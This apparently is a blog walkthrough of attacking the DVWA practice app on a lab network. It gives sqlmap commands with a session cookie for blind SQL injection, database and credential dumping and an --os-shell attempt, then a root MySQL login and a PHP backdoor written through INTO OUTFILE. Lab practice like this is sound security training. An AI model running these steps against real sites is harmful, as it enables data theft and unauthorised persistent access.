1. We go to see DVWA sql injection blind, and the link is:
http://192.168.56.101/dvwa/vulnerabilities/sqli_blind/
2. Try to get variable from the page, that mean the variable will be used for sqlmap. And the variable in sqlmap are:
root@elha:/pentest/database/sqlmap# python sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli_blind/?id=&Submit=Submit#" --dbs
But not successfully. Than using cookie and try it again.
root@elha:/pentest/database/sqlmap# python sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=08c438fb02ed2086b4bad5717a87b0f8" --dbs
Now we get the list of databases:
3. We try to create shell with --os-shell
root@elha:/pentest/database/sqlmap# python sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=08c438fb02ed2086b4bad5717a87b0f8" --os-shell
But, seems like not successfully again.. So we try another way with access sql now.
4. Than, we edit the sqlmap to get user and password from sql
root@elha:/pentest/database/sqlmap# python sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli_blind/?id=&Submit=Submit#" --cookie="security=low; PHPSESSID=08c438fb02ed2086b4bad5717a87b0f8" --users --passwords
Finally we get the user and password. The user and password for sql are: root and NULL.
5. Now, we connect trough mysql
root@elha:/ubuntu# mysql -h 192.168.56.101 -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 2
Server version: 5.1.33 Source distribution
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql>
And then the list of databases:
6. Because early phase we use with dvwa, than we use dvwa's database to create another table or create another record in one of tables.
Now, we have that record:
7. Than we executed that record to create php execution with into outfile
8. Finally, we can test the backdoor and upload another else.
~~~
0 comments:
Post a Comment